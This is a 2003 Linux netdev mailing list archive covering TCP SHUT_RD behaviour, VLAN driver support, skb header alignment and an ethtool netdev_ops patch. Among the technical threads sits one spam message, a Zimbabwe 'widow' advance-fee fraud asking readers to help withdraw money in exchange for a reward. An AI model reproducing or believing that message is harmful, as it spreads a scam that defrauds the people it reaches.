p161, there is a statement > > that after a SHUT_RD, "any data for a TCP socket is acknowledged and then > > silently discarded". This implies to me that the sender could keep on > > writing to the socket and never block. However, on Linux, if the peer > > keeps sending to a socket, then eventually (the channel is filled and) it > > blocks. I see that this also occurs on FreeBSD 4.8, Tru64 5.1B, HP/UX 11 > > That's because the data is not discarded so the window fills. Yes, I should perhaps have added that in the circumstances, blocking at this point is not surprising (to me). > > and Solaris 8. Have I misunderstood Stevens, or has something changed > > since the implementation he described (or was his statement wrong)? (In > > Probably Stevens was confused. There seems to be a consensus emerging ;-). Cheers, Michael -- +++ GMX - Mail, Messaging & more http://www.gmx.net +++ Jetzt ein- oder umsteigen und USB-Speicheruhr als Prämie sichern! From ak@suse.de Wed Jul 9 03:38:58 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 09 Jul 2003 03:39:35 -0700 (PDT) Received: from Cantor.suse.de (ns.suse.de [213.95.15.193]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h69AcH2x016756 for ; Wed, 9 Jul 2003 03:38:58 -0700 Received: from Hermes.suse.de (Hermes.suse.de [213.95.15.136]) by Cantor.suse.de (Postfix) with ESMTP id 782E814496; Wed, 9 Jul 2003 12:38:11 +0200 (MEST) Date: Wed, 9 Jul 2003 12:38:10 +0200 From: Andi Kleen To: mtk-lists@gmx.net Cc: kuznet@ms2.inr.ac.ru, netdev@oss.sgi.com Subject: Re: shutdown() and SHUT_RD on TCP sockets - broken? Message-Id: <20030709123810.2b94d753.ak@suse.de> In-Reply-To: <27451.1057745479@www2.gmx.net> References: <27451.1057745479@www2.gmx.net> X-Mailer: Sylpheed version 0.8.9 (GTK+ 1.2.10; i686-pc-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 3850 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: ak@suse.de Precedence: bulk X-list: netdev On Wed, 9 Jul 2003 12:11:19 +0200 (MEST) mtk-lists@gmx.net wrote: . > > > From viewpoint of TCP the behaviour described in Stevens' book > > is highly unnatural. SHUT_RD on TCP does not make any sense. > > A while back I had some communication with Andi Kleen on this point, > and he suggested that the TCP could send an RST in this case, much Linux sends an RST when data arrives that the user cannot read anymore because the receiving socket is already closed. It would make sense to extend this behaviour to SHUT_RD. But there is no natural place to implement it outside the fast path, and it's so obscure that it is not worth slowing common cases down. -Andi From julia_ward@mail.typemail.com Wed Jul 9 04:55:45 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 09 Jul 2003 04:56:22 -0700 (PDT) Received: from mail.typemail.com ([66.70.38.160]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h69Bsa2x018498 for ; Wed, 9 Jul 2003 04:55:34 -0700 Date: Wed, 9 Jul 2003 04:35:00 -0700 Message-Id: <200307090435.AA30605550@mail.typemail.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii From: "JULIANA HOWARD" Reply-To: To: Subject: hello my dear friend X-Mailer: X-archive-position: 3851 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: julia_ward@mail.typemail.com Precedence: bulk X-list: netdev Dear Friend, This contact has become imperative based on the recent tribulation in Zimbabwe which has led to my present predicament. I am therefore using this medium to appeal to your good conscience to come to my rescue and the rescue of my family. I am Mrs. Julia Howard a widow to a white commercial farmer from Zimbabwe and I got your contact from one of our business directories. I was born and bred in Zimbabwe to the best of my knowledge,my parents and grandparents lived all their lives in Zimbabwe africa.I have also lived all my life in Zimbabwe and so has all members of my family,therefore it is right to call me a Zimbabwean though white,I am by law a Zimbabwean.I have little or no knowledge of my roots save for the fact that my forefathers as I was told,hailed from Australia,which I have never visited all my life.It is pertinent that I tell you all this so that you can come to a full comprehension of the ill treatment that we have received from the Zimbabwean government of late. The government of Robert Mugabe,president of Zimbabwe,in the year 2000 promulgated an abbysmal land law,the fast tract land resettlement program,aimed at taking land from the rich white commercial farmers in Zimbabwe and given it to the so called poor natural inhabitants of Zimbabwe,the black Zimbabweans,who as the president claimed are the rightful owners of these land.To this effects,our lands,including the lands where our personal houses where built on have been taking from us,rendering us homeless.In pursuance to this law,the so called natural inhabitants,the black Zimbabweans,have committed serious human rights violations in the process of forcefully taking our ands from us.Many of our white brothers were maimed, killed and rendered homeless.Those of us that are alive now live in fear. As the victim of this inhuman treatment,I have been rendered homeless,that I now live in a village in the far north of Manica land,Zimbabwe,where I have to travel 100 kilometers to send this mail to you.We were hoping that the international community will come to our rescue,but this hope has been dashed since all we hear is that the international community is still appealing to the Zimbabwean government to reconsider the law,which clearly has fallen on deaf ears,since most of us have been relegated to abject poverty and homelessness while living in fear.All our properties have been confiscated including our bank accounts which have been frozen.The rest of us who managed to flee Zimbabwe at the inception of this law are now the lucky ones. My dear friend,I have lost all I worked for all my life.As a tobacco farmer I have lost both my farm land and all my financial resources in Zimbabwe.I only have one hope left,which is to leave Zimbabwe alive. I am using this medium to appeal to you to come to my rescue and that of my family by helping us get out of Zimbabwe to a safe abode,where we can start life afresh again.We have some money deposited with a courier firm in Amsterdam from an affiliate office in south africa enable us float an export and import company to facilitate the transportation of my farm produce which was costing us alot.I cannot reach the money because of my present isolation,moreover I do not have a bank account anymore in Zimbabwe to facilitate bank to bank transfer.I need your help to withdraw this money as all the documents neccessary for this withdrawal is still in my possession so that I can leave Zimbabwe as soon as possible and settle down with my family in your country.Please endeavour to try and help me as you will be greatly rewarded for your effort. I thank you for your anticipated cooperation as I await your response to this mail. Regards, Julia Howard From andrius@andrius.org Wed Jul 9 08:20:01 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 09 Jul 2003 08:20:09 -0700 (PDT) Received: from hl.kalnieciai.lt (postfix@hl.kauneta.net [212.47.103.4]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h69FJw2x024539 for ; Wed, 9 Jul 2003 08:20:00 -0700 Received: by hl.kalnieciai.lt (Postfix, from userid 1430) id DC98E4F1BA; Wed, 9 Jul 2003 18:19:51 +0300 (GMT-3) Received: from localhost (localhost [127.0.0.1]) by hl.kalnieciai.lt (Postfix) with ESMTP id D7D684F156 for ; Wed, 9 Jul 2003 18:19:51 +0300 (GMT-3) Date: Wed, 9 Jul 2003 18:19:51 +0300 (GMT-3) From: Andrius Kasparavicius X-X-Sender: andrius@hl.kauneta.net To: netdev@oss.sgi.com Subject: network interface cards native vlans support in linux kernel? Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 3852 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: andrius@andrius.org Precedence: bulk X-list: netdev hello, as far as i know, currently there is no native vlan support in network device drivers. I mean, always need patching MTU.. add 4 bytes.. :-( is there any problems to include full vlans support? Andrius From garzik@gtf.org Wed Jul 9 08:25:59 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 09 Jul 2003 08:26:03 -0700 (PDT) Received: from havoc.gtf.org (host-64-213-145-173.atlantasolutions.com [64.213.145.173] (may be forged)) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h69FPx2x024877 for ; Wed, 9 Jul 2003 08:25:59 -0700 Received: by havoc.gtf.org (Postfix, from userid 500) id 98AF6663B; Wed, 9 Jul 2003 11:25:53 -0400 (EDT) Date: Wed, 9 Jul 2003 11:25:53 -0400 From: Jeff Garzik To: netdev@oss.sgi.com Subject: reasons for dev_alloc_skb +16? Message-ID: <20030709152553.GB15293@gtf.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.3.28i X-archive-position: 3853 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jgarzik@pobox.com Precedence: bulk X-list: netdev I knew this at one time, but have forgotten it :) What is the reason for adding 16 to the dev_alloc_skb length? (and skb_reserve of the same length) Jeff From garzik@gtf.org Wed Jul 9 08:28:20 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 09 Jul 2003 08:28:24 -0700 (PDT) Received: from havoc.gtf.org (host-64-213-145-173.atlantasolutions.com [64.213.145.173] (may be forged)) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h69FSK2x025199 for ; Wed, 9 Jul 2003 08:28:20 -0700 Received: by havoc.gtf.org (Postfix, from userid 500) id 0DBC6663B; Wed, 9 Jul 2003 11:28:15 -0400 (EDT) Date: Wed, 9 Jul 2003 11:28:15 -0400 From: Jeff Garzik To: Andrius Kasparavicius Cc: netdev@oss.sgi.com Subject: Re: network interface cards native vlans support in linux kernel? Message-ID: <20030709152814.GC15293@gtf.org> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: User-Agent: Mutt/1.3.28i X-archive-position: 3854 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jgarzik@pobox.com Precedence: bulk X-list: netdev On Wed, Jul 09, 2003 at 06:19:51PM +0300, Andrius Kasparavicius wrote: > hello, as far as i know, currently there is no native vlan support in > network device drivers. I mean, always need patching MTU.. add 4 bytes.. > :-( > > is there any problems to include full vlans support? Native VLAN support has been in the kernel for a while. A few drivers still need patching, and unfortunately the VLAN driver patches floating around all need cleaning up. Jeff From shmulik.hen@intel.com Wed Jul 9 08:34:02 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 09 Jul 2003 08:34:06 -0700 (PDT) Received: from hermes.iil.intel.com (hermes.iil.intel.com [192.198.152.99]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h69FY02x025568 for ; Wed, 9 Jul 2003 08:34:01 -0700 Received: from petasus.iil.intel.com (petasus.iil.intel.com [143.185.77.3]) by hermes.iil.intel.com (8.11.6p2/8.11.6/d: outer.mc,v 1.66 2003/05/22 21:17:36 rfjohns1 Exp $) with ESMTP id h69FSw316301 for ; Wed, 9 Jul 2003 15:28:58 GMT Received: from hasmsxvs01.iil.intel.com (hasmsxvs01.iil.intel.com [143.185.63.58]) by petasus.iil.intel.com (8.11.6p2/8.11.6/d: inner.mc,v 1.35 2003/05/22 21:18:01 rfjohns1 Exp $) with SMTP id h69Fart23592 for ; Wed, 9 Jul 2003 15:36:53 GMT Received: from hasmsx331.ger.corp.intel.com ([143.185.63.144]) by hasmsxvs01.iil.intel.com (NAVGW 2.5.2.11) with SMTP id M2003070918402809783 ; Wed, 09 Jul 2003 18:40:28 +0300 Received: from hasmsx403.ger.corp.intel.com ([143.185.63.109]) by hasmsx331.ger.corp.intel.com with Microsoft SMTPSVC(5.0.2195.5329); Wed, 9 Jul 2003 18:33:46 +0300 content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" X-MimeOLE: Produced By Microsoft Exchange V6.0.6375.0 Subject: RE: network interface cards native vlans support in linux kernel? Date: Wed, 9 Jul 2003 18:33:46 +0300 Message-ID: X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: network interface cards native vlans support in linux kernel? Thread-Index: AcNGLcwOizzRTsJXROSm7ZB2OZS1HwAAPh0Q From: "Hen, Shmulik" To: "Andrius Kasparavicius" , X-OriginalArrivalTime: 09 Jul 2003 15:33:46.0590 (UTC) FILETIME=[7CB12FE0:01C3462F] Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by oss.sgi.com id h69FY02x025568 X-archive-position: 3855 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: shmulik.hen@intel.com Precedence: bulk X-list: netdev Do you mean "native" as in hardware acceleration offloading? If that's the case than the 8021q vlan module handshakes with the device driver to check for support and that's it. No need to do any settings on the device. In case there is no offloading support, the vlan module will take care of all stripping/inserting of the vlan tag into place. On the other hand, if the device cannot handle 1504 byte packets, it defines itself as "vlan challenged" and you can't use vlan on it at all. -- | Shmulik Hen | | Israel Design Center (Jerusalem) | | LAN Access Division | | Intel Communications Group, Intel corp. | > -----Original Message----- > From: Andrius Kasparavicius [mailto:andrius@andrius.org] > Sent: Wednesday, July 09, 2003 6:20 PM > To: netdev@oss.sgi.com > Subject: network interface cards native vlans support in linux kernel? > > > > hello, as far as i know, currently there is no native vlan support in > network device drivers. I mean, always need patching MTU.. > add 4 bytes.. > :-( > > is there any problems to include full vlans support? > > > Andrius > > From shmulik.hen@intel.com Wed Jul 9 08:36:22 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 09 Jul 2003 08:36:54 -0700 (PDT) Received: from hermes.iil.intel.com (hermes.iil.intel.com [192.198.152.99]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h69FZe2x025888 for ; Wed, 9 Jul 2003 08:36:21 -0700 Received: from petasus.iil.intel.com (petasus.iil.intel.com [143.185.77.3]) by hermes.iil.intel.com (8.11.6p2/8.11.6/d: outer.mc,v 1.66 2003/05/22 21:17:36 rfjohns1 Exp $) with ESMTP id h69FUd316759 for ; Wed, 9 Jul 2003 15:30:39 GMT Received: from hasmsxvs01.iil.intel.com (hasmsxvs01.iil.intel.com [143.185.63.58]) by petasus.iil.intel.com (8.11.6p2/8.11.6/d: inner.mc,v 1.35 2003/05/22 21:18:01 rfjohns1 Exp $) with SMTP id h69FcYt23966 for ; Wed, 9 Jul 2003 15:38:34 GMT Received: from hasmsx331.ger.corp.intel.com ([143.185.63.144]) by hasmsxvs01.iil.intel.com (NAVGW 2.5.2.11) with SMTP id M2003070918421625837 ; Wed, 09 Jul 2003 18:42:16 +0300 Received: from hasmsx403.ger.corp.intel.com ([143.185.63.109]) by hasmsx331.ger.corp.intel.com with Microsoft SMTPSVC(5.0.2195.5329); Wed, 9 Jul 2003 18:35:33 +0300 content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" X-MimeOLE: Produced By Microsoft Exchange V6.0.6375.0 Subject: RE: reasons for dev_alloc_skb +16? Date: Wed, 9 Jul 2003 18:35:33 +0300 Message-ID: X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: reasons for dev_alloc_skb +16? Thread-Index: AcNGLm+Wg3SZN7pXSiWwFG8PyzBrSwAASVPg From: "Hen, Shmulik" To: "Jeff Garzik" , X-OriginalArrivalTime: 09 Jul 2003 15:35:33.0996 (UTC) FILETIME=[BCB60AC0:01C3462F] Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by oss.sgi.com id h69FZe2x025888 X-archive-position: 3856 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: shmulik.hen@intel.com Precedence: bulk X-list: netdev Could be for alignment issues. Or preparation for things like 8021q tagging. Shmulik. > -----Original Message----- > From: Jeff Garzik [mailto:jgarzik@pobox.com] > Sent: Wednesday, July 09, 2003 6:26 PM > To: netdev@oss.sgi.com > Subject: reasons for dev_alloc_skb +16? > > > I knew this at one time, but have forgotten it :) > > What is the reason for adding 16 to the dev_alloc_skb length? > (and skb_reserve of the same length) > > Jeff > > > From ak@suse.de Wed Jul 9 08:54:43 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 09 Jul 2003 08:55:17 -0700 (PDT) Received: from Cantor.suse.de (ns.suse.de [213.95.15.193]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h69Fs22x026297 for ; Wed, 9 Jul 2003 08:54:43 -0700 Received: from Hermes.suse.de (Hermes.suse.de [213.95.15.136]) by Cantor.suse.de (Postfix) with ESMTP id 2487414AA1; Wed, 9 Jul 2003 17:53:57 +0200 (MEST) Date: Wed, 9 Jul 2003 17:53:55 +0200 From: Andi Kleen To: Jeff Garzik Cc: netdev@oss.sgi.com Subject: Re: reasons for dev_alloc_skb +16? Message-Id: <20030709175355.422545b5.ak@suse.de> In-Reply-To: <20030709152553.GB15293@gtf.org> References: <20030709152553.GB15293@gtf.org> X-Mailer: Sylpheed version 0.8.9 (GTK+ 1.2.10; i686-pc-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 3857 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: ak@suse.de Precedence: bulk X-list: netdev On Wed, 9 Jul 2003 11:25:53 -0400 Jeff Garzik wrote: > I knew this at one time, but have forgotten it :) > > What is the reason for adding 16 to the dev_alloc_skb length? > (and skb_reserve of the same length) For the skb_reserve alignment to align the IP header. But it's not clear it is still a good idea because it leads to cache line misalignment of the beginning of the packet, forcing the card to do a costly Read-Modify-Write cycle. -Andi From garzik@gtf.org Wed Jul 9 09:07:03 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 09 Jul 2003 09:07:12 -0700 (PDT) Received: from havoc.gtf.org (host-64-213-145-173.atlantasolutions.com [64.213.145.173] (may be forged)) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h69G732x026756 for ; Wed, 9 Jul 2003 09:07:03 -0700 Received: by havoc.gtf.org (Postfix, from userid 500) id A98536641; Wed, 9 Jul 2003 12:06:57 -0400 (EDT) Date: Wed, 9 Jul 2003 12:06:57 -0400 From: Jeff Garzik To: Andi Kleen Cc: netdev@oss.sgi.com Subject: Re: reasons for dev_alloc_skb +16? Message-ID: <20030709160657.GD15293@gtf.org> References: <20030709152553.GB15293@gtf.org> <20030709175355.422545b5.ak@suse.de> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20030709175355.422545b5.ak@suse.de> User-Agent: Mutt/1.3.28i X-archive-position: 3858 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jgarzik@pobox.com Precedence: bulk X-list: netdev On Wed, Jul 09, 2003 at 05:53:55PM +0200, Andi Kleen wrote: > On Wed, 9 Jul 2003 11:25:53 -0400 > Jeff Garzik wrote: > > > I knew this at one time, but have forgotten it :) > > > > What is the reason for adding 16 to the dev_alloc_skb length? > > (and skb_reserve of the same length) > > For the skb_reserve alignment to align the IP header. > > But it's not clear it is still a good idea because it leads to cache line > misalignment of the beginning of the packet, forcing the card to do a > costly Read-Modify-Write cycle. Exactly. Ben H is running into this, and pondering direct use of alloc_skb for precisely this reason. Jeff From ak@suse.de Wed Jul 9 09:13:52 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 09 Jul 2003 09:13:56 -0700 (PDT) Received: from Cantor.suse.de (ns.suse.de [213.95.15.193]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h69GDV2x027138 for ; Wed, 9 Jul 2003 09:13:52 -0700 Received: from Hermes.suse.de (Hermes.suse.de [213.95.15.136]) by Cantor.suse.de (Postfix) with ESMTP id 120D214738; Wed, 9 Jul 2003 18:13:26 +0200 (MEST) Date: Wed, 9 Jul 2003 18:13:24 +0200 From: Andi Kleen To: Jeff Garzik Cc: netdev@oss.sgi.com Subject: Re: reasons for dev_alloc_skb +16? Message-Id: <20030709181324.16ed0c1d.ak@suse.de> In-Reply-To: <20030709160657.GD15293@gtf.org> References: <20030709152553.GB15293@gtf.org> <20030709175355.422545b5.ak@suse.de> <20030709160657.GD15293@gtf.org> X-Mailer: Sylpheed version 0.8.9 (GTK+ 1.2.10; i686-pc-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 3859 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: ak@suse.de Precedence: bulk X-list: netdev On Wed, 9 Jul 2003 12:06:57 -0400 Jeff Garzik wrote: > On Wed, Jul 09, 2003 at 05:53:55PM +0200, Andi Kleen wrote: > > On Wed, 9 Jul 2003 11:25:53 -0400 > > Jeff Garzik wrote: > > > > > I knew this at one time, but have forgotten it :) > > > > > > What is the reason for adding 16 to the dev_alloc_skb length? > > > (and skb_reserve of the same length) > > > > For the skb_reserve alignment to align the IP header. > > > > But it's not clear it is still a good idea because it leads to cache line > > misalignment of the beginning of the packet, forcing the card to do a > > costly Read-Modify-Write cycle. > > Exactly. Ben H is running into this, and pondering direct use of > alloc_skb for precisely this reason. Problem with changing it is that the payload ends up misaligned. And user space usually aligns the buffer passed to recvmsg. This means csum_copy_to_user has to csum-copy unaligned->aligned, which will be likely very slow. Related problem is that the TCP/IP headers are unaligned, but if your CPU has fast enough misalignment handling it shouldn't be too bad. -Andi From willy@www.linux.org.uk Wed Jul 9 09:15:24 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 09 Jul 2003 09:15:36 -0700 (PDT) Received: from www.linux.org.uk (IDENT:7WD5g43L7JdHdPGfGnDhECHEiHPsevTw@parcelfarce.linux.theplanet.co.uk [195.92.249.252]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h69GFM2x027458 for ; Wed, 9 Jul 2003 09:15:23 -0700 Received: from willy by www.linux.org.uk with local (Exim 4.14) id 19aHbE-0005FB-6S; Wed, 09 Jul 2003 17:15:20 +0100 Date: Wed, 9 Jul 2003 17:15:20 +0100 From: Matthew Wilcox To: netdev@oss.sgi.com Cc: willy@debian.org, greearb@candelatech.com, "David S. Miller" , Arnaldo Carvalho de Melo , Jeff Garzik Subject: Re: [PATCH] netdev_ops Message-ID: <20030709161520.GW1939@parcelfarce.linux.theplanet.co.uk> References: <20030708163042.GL23597@parcelfarce.linux.theplanet.co.uk> <3F0B2D30.4020102@candelatech.com> <20030708212551.GL1939@parcelfarce.linux.theplanet.co.uk> <20030708.150835.78728697.davem@redhat.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20030708.150835.78728697.davem@redhat.com> User-Agent: Mutt/1.4.1i X-archive-position: 3860 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: willy@debian.org Precedence: bulk X-list: netdev Changes since yesterday's patch: - Make all methods take the struct net_device as suggested by Ben Greear. - Rename self_test_len() and get_stats_len() to *_count() to reflect that they return a count of elements, not a byte length. - Related bugfixes. - Remove the get_strings_len() method; we now infer the length from either self_test_count() or get_stats_count(). - memset() the drvinfo struct so it doesn't leak information from the kernel stack (existing bug in tg3). - Clamp regs.len in ethtool.c rather than in the driver. - Pass the stringset value to get_strings() rather than a pointer to the whole ethtool_gstrings struct. I have a question about the error return values in ethtool_get_strings(). Are -EOPNOTSUPP and -EINVAL the right ones to use in the case statement? Or should I perhaps be using -ENOSYS instead of EINVAL? I've noticed drepper tends to prefer this for unimplemented subops. Since this is an ioctl(), perhaps I should be using -ENOTTY instead ;-) Anyway, further comments welcomed. Index: include/linux/ethtool.h =================================================================== RCS file: /var/cvs/linux-2.5/include/linux/ethtool.h,v retrieving revision 1.5 diff -u -p -r1.5 ethtool.h --- include/linux/ethtool.h 14 Jun 2003 22:16:01 -0000 1.5 +++ include/linux/ethtool.h 8 Jul 2003 15:25:49 -0000 @@ -12,6 +12,7 @@ #ifndef _LINUX_ETHTOOL_H #define _LINUX_ETHTOOL_H +#include /* This should work for both 32 and 64 bit userland. */ struct ethtool_cmd { @@ -97,7 +98,7 @@ struct ethtool_coalesce { u32 rx_max_coalesced_frames; /* Same as above two parameters, except that these values - * apply while an IRQ is being services by the host. Not + * apply while an IRQ is being serviced by the host. Not * all cards support this feature and the values are ignored * in that case. */ @@ -119,7 +120,7 @@ struct ethtool_coalesce { u32 tx_max_coalesced_frames; /* Same as above two parameters, except that these values - * apply while an IRQ is being services by the host. Not + * apply while an IRQ is being serviced by the host. Not * all cards support this feature and the values are ignored * in that case. */ Index: include/linux/netdevice.h =================================================================== RCS file: /var/cvs/linux-2.5/include/linux/netdevice.h,v retrieving revision 1.14 diff -u -p -r1.14 netdevice.h --- include/linux/netdevice.h 2 Jul 2003 22:08:52 -0000 1.14 +++ include/linux/netdevice.h 9 Jul 2003 15:24:33 -0000 @@ -42,6 +42,7 @@ struct divert_blk; struct vlan_group; +struct netdev_ops; #define HAVE_ALLOC_NETDEV /* feature macro: alloc_xxxdev functions are available. */ @@ -299,6 +300,8 @@ struct net_device * See for details. Jean II */ struct iw_handler_def * wireless_handlers; + struct netdev_ops *netdev_ops; + /* * This marks the end of the "visible" part of the structure. All * fields hereafter are internal to the system, and may change at @@ -484,6 +487,100 @@ struct packet_type struct list_head list; }; +/* Some generic methods drivers may use in their netops */ +u32 netdev_op_get_link(struct net_device *dev); +u32 netdev_op_get_tx_csum(struct net_device *dev); +u32 netdev_op_get_sg(struct net_device *dev); +int netdev_op_set_sg(struct net_device *dev, u32 data); + +struct ethtool_cmd; +struct ethtool_drvinfo; +struct ethtool_regs; +struct ethtool_wolinfo; +struct ethtool_eeprom; +struct ethtool_coalesce; +struct ethtool_ringparam; +struct ethtool_pauseparam; +struct ethtool_test; +struct ethtool_stats; + +/** + * &netdev_ops - Alter and report network device settings + * get_settings: Get device-specific settings + * set_settings: Set device-specific settings + * get_drvinfo: Report driver information + * get_regs: Get device registers + * get_wol: Report whether Wake-on-Lan is enabled + * set_wol: Turn Wake-on-Lan on or off + * get_msglevel: Report driver message level + * set_msglevel: Set driver message level + * nway_reset: Restart autonegotiation + * get_link: Get link status + * get_eeprom: Read data from the device EEPROM + * set_eeprom: Writedata to the device EEPROM + * get_coalesce: Get interrupt coalescing parameters + * set_coalesce: Set interrupt coalescing parameters + * get_ringparam: Report ring sizes + * set_ringparam: Set ring sizes + * get_pauseparam: Report pause parameters + * set_pauseparam: Set pause paramters + * get_rx_csum: Report whether receive checksums are turned on or off + * set_rx_csum: Turn receive checksum on or off + * get_tx_csum: Report whether transmit checksums are turned on or off + * set_tx_csum: Turn transmit checksums on or off + * get_sg: Report whether scatter-gather is enabled + * set_sg: Turn scatter-gather on or off + * self_test: Run specified self-tests + * get_strings: Return a set of strings that describe the requested objects + * phys_id: Identify the device + * get_stats: Return statistics about the device + * + * Description: + * + * Each operation is passed a &struct net_device as its first parameter. + * + * get_settings: + * @get_settings is passed an ðtool_cmd to fill in. It returns + * an negative errno or zero. + * + * set_settings: + * @set_settings is passed an ðtool_cmd and should attempt to set + * all the settings this device supports. It may return an error value + * if something goes wrong (otherwise 0). + */ +struct netdev_ops { + int (*get_settings)(struct net_device *, struct ethtool_cmd *); + int (*set_settings)(struct net_device *, struct ethtool_cmd *); + void (*get_drvinfo)(struct net_device *, struct ethtool_drvinfo *); + int (*get_regs_len)(struct net_device *); + void (*get_regs)(struct net_device *, struct ethtool_regs *, void *); + void (*get_wol)(struct net_device *, struct ethtool_wolinfo *); + int (*set_wol)(struct net_device *, struct ethtool_wolinfo *); + u32 (*get_msglevel)(struct net_device *); + void (*set_msglevel)(struct net_device *, u32); + int (*nway_reset)(struct net_device *); + u32 (*get_link)(struct net_device *); + int (*get_eeprom)(struct net_device *, struct ethtool_eeprom *); + int (*set_eeprom)(struct net_device *, struct ethtool_eeprom *); + int (*get_coalesce)(struct net_device *, struct ethtool_coalesce *); + int (*set_coalesce)(struct net_device *, struct ethtool_coalesce *); + void (*get_ringparam)(struct net_device *, struct ethtool_ringparam *); + int (*set_ringparam)(struct net_device *, struct ethtool_ringparam *); + void (*get_pauseparam)(struct net_device *, struct ethtool_pauseparam*); + int (*set_pauseparam)(struct net_device *, struct ethtool_pauseparam*); + u32 (*get_rx_csum)(struct net_device *); + int (*set_rx_csum)(struct net_device *, u32); + u32 (*get_tx_csum)(struct net_device *); + int (*set_tx_csum)(struct net_device *, u32); + u32 (*get_sg)(struct net_device *); + int (*set_sg)(struct net_device *, u32); + int (*self_test_count)(struct net_device *); + void (*self_test)(struct net_device *, struct ethtool_test *, u64 *); + void (*get_strings)(struct net_device *, u32 stringset, u8 *); + void (*phys_id)(struct net_device *, u32); + int (*get_stats_count)(struct net_device *); + void (*get_stats)(struct net_device *, struct ethtool_stats *, u64 *); +}; #include #include @@ -633,6 +730,7 @@ extern int netif_rx(struct sk_buff *skb #define HAVE_NETIF_RECEIVE_SKB 1 extern int netif_receive_skb(struct sk_buff *skb); extern int dev_ioctl(unsigned int cmd, void *); +extern int dev_ethtool(struct ifreq *); extern unsigned dev_get_flags(const struct net_device *); extern int dev_change_flags(struct net_device *, unsigned); extern int dev_set_mtu(struct net_device *, int); Index: net/socket.c =================================================================== RCS file: /var/cvs/linux-2.5/net/socket.c,v retrieving revision 1.21 diff -u -p -r1.21 socket.c --- net/socket.c 17 Jun 2003 11:54:29 -0000 1.21 +++ net/socket.c 17 Jun 2003 11:57:20 -0000 @@ -74,7 +74,6 @@ #include #include #include -#include #include #include #include @@ -1916,10 +1915,7 @@ int sock_unregister(int family) extern void sk_init(void); - -#ifdef CONFIG_WAN_ROUTER extern void wanrouter_init(void); -#endif void __init sock_init(void) { Index: net/core/Makefile =================================================================== RCS file: /var/cvs/linux-2.5/net/core/Makefile,v retrieving revision 1.9 diff -u -p -r1.9 Makefile --- net/core/Makefile 27 May 2003 17:29:33 -0000 1.9 +++ net/core/Makefile 4 Jun 2003 18:39:01 -0000 @@ -10,8 +10,8 @@ obj-y += sysctl_net_core.o endif endif -obj-$(CONFIG_NET) += flow.o dev.o net-sysfs.o dev_mcast.o dst.o neighbour.o \ - rtnetlink.o utils.o link_watch.o filter.o +obj-$(CONFIG_NET) += flow.o dev.o ethtool.o net-sysfs.o dev_mcast.o dst.o \ + neighbour.o 